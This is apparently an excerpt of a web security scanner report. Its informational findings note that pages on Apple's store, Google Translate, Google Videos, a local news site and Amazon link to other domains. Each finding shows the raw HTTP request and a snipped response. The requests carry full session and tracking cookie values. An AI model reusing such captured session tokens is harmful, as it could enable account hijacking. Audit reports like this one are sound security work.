Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/instant_credit

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/instant_credit?mco=MTkyMTQ2NzY HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:48:52 GMT
Cache-Control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
Expires: Wed, 02 Feb 2011 17:48:52 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: *
Date: Thu, 03 Feb 2011 17:48:52 GMT
x-request-id: 158d0e82-3a38-484c-b94a-9cb371b30389
Content-Length: 39643
Pragma: no-cache
x-frame-options: sameorigin

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   
<t
...[SNIP]...
class="terms-details">If balances are not paid in full by the end of the applicable period, or if a late payment is made, interest will be charged from the purchase date at a 22.99% variable APR. See <a target="popupw650h650" href="https://www.juniper.com/app/japply/lp/TnCs.jsp?prodidreq=CCVPS31484">Terms and Conditions</a>
...[SNIP]...
ical card, which will be delivered in 7-10 business days. If you choose to check out online today, your Barclaycard Visa account number will automatically be sent to Apple during the checkout process (<a href="https://www.barclaycardus.com/app/japply/misc/apple_faq.jsp">Visit the Barclays site to learn more</a>
...[SNIP]...
<p><a href="https://www.barclaycardus.com/app/japply/misc/apple_faq.jsp">Visit the Barclays site to learn more.</a>
...[SNIP]...
<p>(1) This offer is available to qualified U.S. residents and the card is issued by Barclays Bank Delaware. These financing offers are limited to new cardholders. See <a target="popupw650h650" href="https://www.juniper.com/app/japply/lp/TnCs.jsp?prodidreq=CCVPS31484">terms and conditions</a>
...[SNIP]...
</a>, <a href="http://www.itunes.com/">www.itunes.com</a>
...[SNIP]...
od or you make a late payment, you will be charged interest from the date of the purchase at the purchase APR (currently 22.99%). This APR will vary with the market based on the Prime Rate. Please see <a target="popupw650h650" href="https://www.juniper.com/app/japply/lp/TnCs.jsp?prodidreq=CCVPS31484">terms and conditions</a>
...[SNIP]...
od or you make a late payment, you will be charged interest from the date of the purchase at the purchase APR (currently 22.99%). This APR will vary with the market based on the Prime Rate. Please see <a target="popupw650h650" href="https://www.juniper.com/app/japply/lp/TnCs.jsp?prodidreq=CCVPS31484">terms and conditions</a>
...[SNIP]...
</a>, <a href="http://www.itunes.com/">www.itunes.com</a>
...[SNIP]...
</a>, <a href="http://www.itunes.com/">www.itunes.com</a>
...[SNIP]...
<p>(2) Offer subject to credit approval. Not everyone will qualify. See <a target="popupw650h650" href="https://www.barclaycardus.com/app/japply/lp/TnCs.jsp?prodidreq=CCVPS24984">terms and conditions</a>
...[SNIP]...
lders. For information about rates, fees, other costs and the reward program rules (including points accrual rate, etc.) and benefits associated with the use of this credit card program please see the <a target="popupw650h650" href="https://www.barclaycardus.com/app/japply/lp/TnCs.jsp?prodidreq=CCVPS24984">terms and conditions</a>
...[SNIP]...
nts will accumulate at 2 (two) points per one dollar ($1.00) spent on eligible purchases at Apple. Points for all other purchases will accumulate 1 (one) point per one dollar ($1.00) spent. Please see <a target="popupw650h650" href="https://www.barclaycardus.com/app/japply/lp/TnCs.jsp?prodidreq=CCVPS24984">terms and conditions</a>
...[SNIP]...

18.110. http://store.apple.com/us/product/MC660Z/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MC660Z/A

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/product/MC660Z/A?fnode=NDY2NDE4Mg&mco=MjEwOTA5MzA HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:07:05 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:49 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:49 GMT
x-request-id: d7774e57-b2a6-490f-bd50-0e6a7f15a821
Content-Length: 66677
ETag: "9a43a4b6714ab9192131c567d2af2c4d"
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>MobileMe - English - Apple Store (U.S.)</title>

<meta http-equiv="X-UA
...[SNIP]...
and folders stay in sync no matter where you check your email, and new messages are pushed to all your devices automatically. You can also access your email from any computer using ad-free webmail at <a href="http://www.me.com" target="_blank">me.com</a>
...[SNIP]...
se agreements provided to you as part of MobileMe. MobileMe is available to persons age 13 and older. Annual subscription fee required. Use the key included in the box to activate your subscription at <a href="http://www.me.com/activate" target="_blank">www.me.com/activate</a>
...[SNIP]...

18.111. https://store.apple.com/us/sign_in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /us/sign_in

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/sign_in?c=f63ef1babc027e38d46ff1531c1e3f73&r=SXYD4UDAPXU7P7KXF&s=ba6fdbd16f511f7872ee65ac03f444f3&t=SXYD4UDAPXU7P7KXF HTTP/1.1
Host: store.apple.com
Connection: keep-alive
Referer: http://store.apple.com/us/cart?mco=MTA4NTI1NTY
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; s_cc=true; s_sq=appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:55:50 GMT
Cache-Control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
Expires: Wed, 02 Feb 2011 17:55:50 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: *
pragma: no-cache
Date: Thu, 03 Feb 2011 17:55:50 GMT
x-request-id: fa9094e7-5e38-4e67-a544-4b0a139b3610
Cteonnt-Length: 14397
x-frame-options: sameorigin
Content-Length: 14397

<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   <meta name="robots" content="noindex, nofollow"/>
   
<title>Apple Online Store - Apple Stor
...[SNIP]...
</noscript>


<link rel="stylesheet" href="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/applestore-rs-1.css" media="screen, print" />

<link rel="stylesheet" href="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/applestore-rs-2.css" media="screen, print" />

<!--[if IE 6]>
...[SNIP]...
<![endif]-->


<link rel="stylesheet" href="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/Catalog/regional/amr/css/aos-overrides.css" media="screen, print" />

<!--[if IE 6]>
...[SNIP]...
<![endif]-->


<link rel="stylesheet" href="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/Catalog/US/Images/css/aos-local.css" media="" />

<!--[if IE 6]>
...[SNIP]...
<![endif]-->


<script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/bootstrap/release/bootstrap.js"></script>


<script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/coherent/release/coherent.js"></script>

<script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/apple.js"></script>
...[SNIP]...
</script>
       
       <script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/chat.js"></script>
   

   <link rel="stylesheet" href="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/css/applestore-print.css" media="print" />
   <script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/checkout.js"></script>
   <script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/account.js"></script>
...[SNIP]...
</script>

<script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/metrics/s_code_h.js"></script>
...[SNIP]...

18.112. http://translate.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:57 GMT
Expires: Thu, 03 Feb 2011 20:32:57 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=13a295ad44fc1a6d:TM=1296765177:LM=1296765177:S=6qmhRUhjN7gOG7xT; expires=Sat, 02-Feb-2013 20:32:57 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

18.113. http://video.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?hl=en&tab=wv HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 20:33:05 GMT
Expires: Thu, 03 Feb 2011 20:33:05 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=fd4954f609ee6603:TM=1296765185:LM=1296765185:S=ayaCfkXCHaIGE8tX; expires=Sat, 02-Feb-2013 20:33:05 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...
</div><a class=gb2 href=http://www.youtube.com/?hl=en&tab=v1 onclick=gbar.qs(this)>YouTube</a>
...[SNIP]...
<div class=div-footer>
<a href=http://googlevideo.blogspot.com/>Blog</a>
...[SNIP]...

18.114. http://www.abc3340.com/Global/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc3340.com
Path:   /Global/story.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Global/story.asp?S\\x3d13894878\\x22 HTTP/1.1
Host: www.abc3340.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 410 Gone
Server: Microsoft-IIS/6.0
WN: IIS53
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: MEMORY
wn_vars: ItemDoesNotExist
X-Robots-Tag: noindex
X-Robots-Tag: noarchive
Content-Type: text/html; charset=utf-8
Content-Length: 41096
Expires: Thu, 03 Feb 2011 21:48:17 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 21:48:17 GMT
Connection: close
Set-Cookie: ClientGroup=1; expires=Fri, 03-Feb-2012 05:00:00 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Our Apolog
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WBMA.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WBMA.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
<link type="text/css" rel="stylesheet" media="all" href="http://content.worldnow.com/global/interface/container-e/core.css?ver=201011111600">
<link type="text/css" rel="stylesheet" media="all" href="http://WBMA.images.worldnow.com/interface/css/container-e.css?ver=2011-01-26%2014%3A22%3A58">
<!--[if lt IE 6]>
...[SNIP]...
<!--MENU INCLUDES-->
<link rel="stylesheet" href="http://content.worldnow.com/global/interface/menu/menu.css?ver=201011111600" type="text/css"><style type="text/css">
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
<!--Page Include: HEAD--><script type="text/javascript" src="http://ftpcontent.worldnow.com/wbma/custom/custom.js"></script><link rel="stylesheet" type="text/css" href="http://ftpcontent.worldnow.com/wbma/custom/custom.css" /><!--END Page Include: HEAD-->
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<label for="WNSearchBox-headertop-google_cs">WEB SEARCH BY <img src='http://WBMA.images.worldnow.com/global/images/google/google_logo.png' alt='Google' class='wnSearchBoxLabelImg-google'></label>
...[SNIP]...
<div id="WNBranding"><img id="WNBrandingImage" usemap="#wnBrandingMap" alt="" border="0" src="http://WBMA.images.worldnow.com/images/static/hdr/hdr_branding.jpg"><map name="wnBrandingMap">
...[SNIP]...
<a href="/Global/category.asp?C=189733"><img src="http://WBMA.images.worldnow.com/images/363196_G.gif" width="43" height="36" border="0" alt="Home" title="Home" onsrc="http://WBMA.images.worldnow.com/images/363198_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=189736"><img src="http://WBMA.images.worldnow.com/images/363200_G.gif" width="40" height="36" border="0" alt="News Headlines" title="News Headlines" onsrc="http://WBMA.images.worldnow.com/images/363202_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=189734"><img src="http://WBMA.images.worldnow.com/images/363204_G.gif" width="64" height="36" border="0" alt="Weather" title="Weather" onsrc="http://WBMA.images.worldnow.com/images/363208_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=189737"><img src="http://WBMA.images.worldnow.com/images/363211_G.gif" width="48" height="36" border="0" alt="Sports" title="Sports" onsrc="http://WBMA.images.worldnow.com/images/363212_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=189742"><img src="http://WBMA.images.worldnow.com/images/363213_G.gif" width="42" height="36" border="0" alt="Video Landing Page" title="Video Landing Page" onsrc="http://WBMA.images.worldnow.com/images/363214_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=189738"><img src="http://WBMA.images.worldnow.com/images/368248_G.gif" width="65" height="36" border="0" alt="Contests" title="Contests" onsrc="http://WBMA.images.worldnow.com/images/368249_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=191067"><img src="http://WBMA.images.worldnow.com/images/363217_G.gif" width="64" height="36" border="0" alt="Features" title="Features" onsrc="http://WBMA.images.worldnow.com/images/363218_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=191068"><img src="http://WBMA.images.worldnow.com/images/363220_G.gif" width="62" height="36" border="0" alt="Interact" title="Interact" onsrc="http://WBMA.images.worldnow.com/images/363221_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=68446"><img src="http://WBMA.images.worldnow.com/images/363222_G.gif" width="61" height="36" border="0" alt="LIFESTYLE" title="LIFESTYLE" onsrc="http://WBMA.images.worldnow.com/images/363223_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=191069"><img src="http://WBMA.images.worldnow.com/images/363224_G.gif" width="66" height="36" border="0" alt="About Us" title="About Us" onsrc="http://WBMA.images.worldnow.com/images/363225_G.gif"></a>
...[SNIP]...
<a href="/Global/category.asp?C=191070"><img src="http://WBMA.images.worldnow.com/images/363226_G.gif" width="108" height="36" border="0" alt="Programming" title="Programming" onsrc="http://WBMA.images.worldnow.com/images/363227_G.gif"></a>
...[SNIP]...
<li class="wnAddThisTool wnAddThisTool-All"><a href="http://addthis.com/bookmark.php?v=250&amp;username=xa-4bbcc485014c0ab2" class="addthis_button_compact">Share</a>
...[SNIP]...
<!--END WNStoryUtils-->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bbcc485014c0ab2"></script>
...[SNIP]...
<div id="WNCopyright"><a href="http://www.worldnow.com" target="_blank"><img src="http://WBMA.images.worldnow.com/images/static/container-e/wn_powerby.gif" alt="Powered by WorldNow" border="0"></a>
...[SNIP]...
<noscript><img src="http://analytics.worldnow.com/dcsuhch2hzersfqyzf2de5tct_4d8l/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0&amp;WT.sp=WBMA&amp;dcssip=www.abc3340.com" name="DCSIMG" width="1" height="1" border="0" alt=""></noscript>
...[SNIP]...

18.115. http://www.amazon.com/s/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /s/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /s/?ie=UTF8&keywords=smart+draw&tag=googhydr-20&index=aps&hvadid=5259544277&ref=pd_sl_7898cfz3it_b/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:22 GMT
Server: Server
x-amz-id-1: 1TM9NR3WYFJRE0JGNVSH
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: hNqo77gs/CzqHrFJPq5mRol7jkFxAaFzlzRCsLuZJgXNCX+nmUNlVbHREV9FTrFX
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-8526459-0757201; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 208859


<html>
<head>


<meta http-equiv="content-type" c
...[SNIP]...
<meta name="description" content="Amazon.com: smart draw" />


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/search-css/search-css-search-43782.css._V172756609_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<a name="navSwmSkedPop|he|navSwmSkedPop_content"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" class="default navSprite" id="navSwmFlyoutImage" height="1" border="0" /></a>
...[SNIP]...
<td class="kSprite spr_kindOfSortTabLeft">
<img width="6" height="16" border="0" alt="" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif"></td>
...[SNIP]...
<a name="kindOfSort|he|kindOfSort_content" id="kindOfSortHotspot">Department&nbsp;<img width="13" height="13" border="0" class="srSprite spr_kindOfSortBtn" id="kindOfSort_hotspot_btnImg" alt="" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif"></a>
...[SNIP]...
<td class="kSprite spr_kindOfSortTabRight">
<img width="4" height="16" border="0" alt="" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif"></td>
...[SNIP]...
<a href="http://www.amazon.com/SmartDraw-com-18800-SmartDraw-VP/dp/1935341049/ref=sr_1_1?ie=UTF8&qid=1296769702&sr=8-1">
<img src="http://ecx.images-amazon.com/images/I/41Ndl4XVJ3L._AA160_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/SmartDraw-com-SDL8-SmartDraw-Legal-Edition/dp/B000KKS2N2/ref=sr_1_2?ie=UTF8&qid=1296769702&sr=8-2">
<img src="http://ecx.images-amazon.com/images/I/41GE24W3MTL._AA115_.jpg" class="productImage" alt="Product Details"/>
</a>
...[SNIP]...
<a href="http://www.amazon.com/SmartDraw-com-SDS10-CD-SmartDraw-2009/dp/B001GZUXKK/ref=sr_1_3?ie=UTF8&qid=1296769702&sr=8-3">
